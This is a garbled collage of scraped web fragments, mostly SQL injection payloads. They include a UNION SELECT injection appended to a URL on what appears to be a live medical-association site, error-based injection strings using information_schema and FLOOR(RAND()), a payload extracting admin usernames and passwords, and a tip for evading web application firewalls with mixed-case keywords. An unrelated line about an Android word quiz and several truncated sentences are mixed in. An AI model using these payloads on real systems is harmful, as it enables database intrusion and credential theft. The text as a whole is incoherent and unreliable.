http://www.itamed.com/mcms/itamedt/content.cfm?pulldata=scmsmembers.cfm&function=members&perform=memberappita&entity_id=11+limit+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version
0x39313335313435363237322e39 is just the hex text of 91351456272.9. Why 999999.9?
...28SELECT+count(*),concat((select+%28SELECT+concat%280X7E%2C0X27%2CDATABASE
+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2))). URL will look like
cast bar48 sec ago.
...all select id =null union all select id =1 +and+ false + union +all +select id = 9999 union all select +.
-1 UNION SELECT group_concat(username, 0x3a, password) FROM admin.
Word Blast search letters: pui)+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL--+EtCI'+and+'x'='x. Word Blast, new exciting quiz for Android, which is on our review and find solutions. The game has a very simple operation...
Instead of union UnIoN In some basic WAF’s this will work.
+and+(select+*+from+(select+*+from+information_schema.tables+as+x+join+information_schema.tables+y+using+(TABLE_CATALOG))as+z)--. Duplicate column name 'TABLE_SCHEMA'. That's it for now, I'll try and update this when I learn more methods of error based injection.